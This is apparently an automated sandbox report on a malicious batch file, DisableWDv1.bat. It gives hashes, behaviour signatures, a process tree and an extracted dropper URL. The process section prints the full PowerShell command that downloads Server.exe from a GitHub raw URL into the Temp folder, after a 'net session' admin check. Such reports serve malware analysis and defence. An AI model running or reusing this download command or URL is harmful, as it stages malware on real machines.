Analysis
-
max time kernel
120s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
08-01-2025 22:39
Static task
static1
Behavioral task
behavioral1
Sample
DisableWDv1.bat
Resource
win7-20241010-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
DisableWDv1.bat
Resource
win10v2004-20241007-en
16 signatures
150 seconds
General
-
Target
DisableWDv1.bat
-
Size
664B
-
MD5
d5ae652c3c0c4ed6269743dbfb5ce953
-
SHA1
43a8888f001b9b7e2629746848f2a1601acb60f2
-
SHA256
bc29f3e495e73cab8b5cc4b63d0048109fe3f33f3d209939a279053d4091448e
-
SHA512
2d05a38a154adfba0b2e6d0ff38a6c3e21b6f0ec840f5618bee6b06836aef255cf98d4ad578cedf4a49955fa1cb0c4d3255c028a47fd83dcc6af1e20b62e9499
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://raw.githubusercontent.com/pebiko70/test/main/Server.exe
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2944 powershell.exe 6 2944 powershell.exe -
pid Process 2944 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 4 raw.githubusercontent.com 5 raw.githubusercontent.com 6 raw.githubusercontent.com -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2944 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2944 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2892 wrote to memory of 2796 2892 cmd.exe 31 PID 2892 wrote to memory of 2796 2892 cmd.exe 31 PID 2892 wrote to memory of 2796 2892 cmd.exe 31 PID 2796 wrote to memory of 2772 2796 net.exe 32 PID 2796 wrote to memory of 2772 2796 net.exe 32 PID 2796 wrote to memory of 2772 2796 net.exe 32 PID 2892 wrote to memory of 2944 2892 cmd.exe 33 PID 2892 wrote to memory of 2944 2892 cmd.exe 33 PID 2892 wrote to memory of 2944 2892 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\DisableWDv1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:2772
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/pebiko70/test/main/Server.exe', 'C:\Users\Admin\AppData\Local\Temp\Server.exe')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2944
-